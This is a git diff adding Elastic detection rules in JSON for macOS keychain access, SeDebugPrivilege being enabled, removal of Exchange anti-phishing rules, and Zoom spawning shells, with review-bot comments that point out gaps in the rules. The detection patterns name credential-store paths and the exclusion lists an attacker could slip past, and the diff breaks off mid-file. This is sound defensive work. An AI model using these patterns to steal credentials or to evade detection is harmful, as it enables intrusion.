@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes and certificates.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Access to Keychain Credentials Directories", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.args :\n (\n \"/Users/*/Library/Keychains/*\",\n \"/Library/Keychains/*\",\n \"/Network/Library/Keychains/*\",\n \"System.keychain\",\n \"login.keychain-db\",\n \"login.keychain\"\n ) and\n not process.args : (\"find-certificate\",\n \"add-trusted-cert\",\n \"set-keychain-settings\",\n \"delete-certificate\",\n \"/Users/*/Library/Keychains/openvpn.keychain-db\",\n \"show-keychain-info\",\n \"lock-keychain\",\n \"set-key-partition-list\",\n \"import\",\n \"find-identity\") and\n not process.parent.executable :\n (\n \"/Applications/OpenVPN Connect/OpenVPN Connect.app/Contents/MacOS/OpenVPN Connect\",\n \"/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise\",\n \"/opt/jc/bin/jumpcloud-agent\"\n ) and\n not process.executable : \"/opt/jc/bin/jumpcloud-agent\"\n", + "references": [ + "https://objective-see.com/blog/blog_0x25.html", + "https://securelist.com/calisto-trojan-for-macos/86543/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "96e90768-c3b7-4df6-b5d9-6237f8bc36a8", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.001", + "name": "Keychain", + "reference": "https://attack.mitre.org/techniques/T1555/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "96e90768-c3b7-4df6-b5d9-6237f8bc36a8_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_7.json b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_7.json new file mode 100644 index 00000000000..ca89d14b9df --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_7.json 
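Review bot: The allow-listed arguments (`find-certificate`, `add-trusted-cert`, `set-keychain-settings`, `delete-certificate`, `show-keychain-info`, `lock-keychain`, `set-key-partition-list`, `import`, `find-identity`) are subcommands of the macOS `security` command-line tool, but the `not process.args : (...)` clause is not tied to that binary, so it suppresses the alert for any process whose argument list happens to contain one of these tokens while touching a keychain path. Scoping the exclusion to the tool it was written for, e.g. `not (process.name == "security" and process.args : (...))`, keeps the carve-out as narrow as intended. This rule is `severity: high` / `risk_score: 73` yet, unlike the other Elastic Defend rules in this commit, carries no `note` investigation guide; a short triage section (what legitimate keychain access looks like, which parent executables are expected) would be worth adding.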
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a process running as SYSTEM and impersonating a Windows core binary privileges. Adversaries may create a new process with a different token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "SeDebugPrivilege Enabled by a Suspicious Process", + "query": "any where host.os.type == \"windows\" and event.provider: \"Microsoft-Windows-Security-Auditing\" and\n event.action : \"Token Right Adjusted Events\" and\n\n winlog.event_data.EnabledPrivilegeList : \"SeDebugPrivilege\" and\n\n /* exclude processes with System Integrity */\n not winlog.event_data.SubjectUserSid : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n\n not winlog.event_data.ProcessName :\n (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\WinSxS\\\\*\",\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\MRT.exe\",\n \"?:\\\\Windows\\\\System32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostw.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*-*\\\\DismHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\auditpol.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSe.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSe.exe\")\n", + "references": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4703", + "https://blog.palantir.com/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ 
+ { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.EnabledPrivilegeList", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ProcessName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "97020e61-e591-4191-8a3b-2861a2b887cd", + "setup": "## Setup\n\nWindows Event 4703 logs Token Privileges changes and need to be configured (Enable).\n\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDetailed Tracking >\nToken Right Adjusted Events (Success)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "97020e61-e591-4191-8a3b-2861a2b887cd_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_103.json b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_103.json new file mode 100644 index 00000000000..3a39a12b625 --- /dev/null 
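Review bot: The `description` does not match the `query`: it describes "the creation of a process running as SYSTEM and impersonating a Windows core binary privileges", whereas the query matches Security-Auditing `Token Right Adjusted Events` (event 4703) in which `SeDebugPrivilege` is enabled, and it explicitly excludes the SYSTEM, LocalService and NetworkService SIDs (`S-1-5-18`, `S-1-5-19`, `S-1-5-20`). A wording closer to the logic would be `Identifies a process enabling SeDebugPrivilege (Windows event 4703) from an account other than the built-in service SIDs and from outside well-known system paths; adversaries enable this privilege to access protected processes and escalate privileges.` The `"?:\\Program Files\\*"` and `"?:\\Program Files (x86)\\*"` exclusions cover every installed application, which is a broad gap that deserves a comment in the query alongside the existing `/* exclude processes with System Integrity */`. In `required_fields`, `winlog.event_data.EnabledPrivilegeList` is declared `"type": "unknown"` while its sibling `winlog.event_data.*` fields are `keyword`; if the mapping is known it should be stated, and the `setup` sentence "logs Token Privileges changes and need to be configured (Enable)" reads awkwardly.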
+++ b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_103.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks.", + "false_positives": [ + "An anti-phishing rule may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Anti-Phish Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-AntiPhishRule\" or \"Disable-AntiPhishRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-antiphishrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "97314185-2568-4561-ae81-f3e480e5e695", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: 
Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "97314185-2568-4561-ae81-f3e480e5e695_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_105.json b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_105.json new file mode 100644 index 00000000000..8c07de0084e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_105.json 
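Review bot: `name` and `description` say this rule identifies the "modification" of an anti-phishing rule, but `query` only matches `event.action:("Remove-AntiPhishRule" or "Disable-AntiPhishRule")`, and `false_positives` likewise talks only about deletion; either narrow the description to removal/disabling or, if modification is intended, consider whether `Set-AntiPhishRule` belongs in the action list. `"note": ""` is an empty investigation guide and should either be dropped or filled with triage guidance (who is authorised to change Exchange protection policies, how to confirm the change ticket). The same rule content is added three times in this commit as versions 103, 105 and 206 (the 105 and 206 copies follow this one) with no visible difference other than `version` and `id`; if those are intentional no-op version bumps that is worth a sentence in the commit description.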
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks.", + "false_positives": [ + "An anti-phishing rule may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Anti-Phish Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-AntiPhishRule\" or \"Disable-AntiPhishRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-antiphishrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "97314185-2568-4561-ae81-f3e480e5e695", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: 
Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "97314185-2568-4561-ae81-f3e480e5e695_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_206.json b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_206.json new file mode 100644 index 00000000000..b732e987c0a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_206.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks.", + "false_positives": [ + "An anti-phishing rule may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Anti-Phish Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-AntiPhishRule\" or \"Disable-AntiPhishRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-antiphishrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "97314185-2568-4561-ae81-f3e480e5e695", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: 
Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "97314185-2568-4561-ae81-f3e480e5e695_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_109.json b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_109.json new file mode 100644 index 00000000000..f435cfdf3fd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_109.json 
@@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious Zoom child process was detected, which may indicate an attempt to run unnoticed. Verify process details such as command line, network connections, file writes and associated file signature details as well.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Zoom Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"Zoom.exe\" and process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "97aba1ef-6034-4bd3-8c1a-1e0996b27afa", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + }, + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": 
"T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "97aba1ef-6034-4bd3-8c1a-1e0996b27afa_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_110.json b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_110.json new file mode 100644 index 00000000000..8898e862d3c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_110.json 
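Review bot: `index` lists `logs-system.security*` and `winlogbeat-*`, but `related_integrations` declares only `endpoint` and `windows`, so the integration that produces `logs-system.security*` (presumably the `system` package) is not surfaced to the user as a required data source; the version 110 snapshot added in the next hunk has the same gap. Either add an entry such as `{ "package": "system", "version": "<UPSTREAM_PIN>" }` with the version the upstream rule set pins, or drop the index pattern if the fields the query needs (`process.parent.name`, `event.type`) are not expected from that data stream. The two snapshots otherwise differ only in the `logs-endpoint.events.*` to `logs-endpoint.events.process-*` index change, which is fine as versioned history.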
@@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious Zoom child process was detected, which may indicate an attempt to run unnoticed. Verify process details such as command line, network connections, file writes and associated file signature details as well.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Zoom Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"Zoom.exe\" and process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "97aba1ef-6034-4bd3-8c1a-1e0996b27afa", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + 